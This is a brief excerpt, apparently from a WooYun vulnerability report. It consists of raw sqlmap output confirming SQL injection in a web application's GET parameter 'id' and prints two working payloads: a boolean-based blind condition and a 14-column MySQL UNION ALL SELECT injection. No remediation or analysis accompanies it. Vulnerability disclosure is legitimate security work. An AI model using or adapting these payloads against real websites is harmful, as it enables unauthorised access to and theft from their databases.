WooYun.org

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] n
sqlmap identified the following injection points with a total of 44 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1357 AND 6040=6040
    Vector: AND [INFERENCE]
    Type: UNION query
    Title: MySQL UNION query (NULL) - 14 columns
    Payload: id=1357 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CO
NCAT(0x3a636a773a,0x5458737254686b43745a,0x3a626f6c3a), NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL#
    Vector:  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, [QUERY], NULL, NULL,
 NULL, NULL, NULL, NULL, NULL, NULL#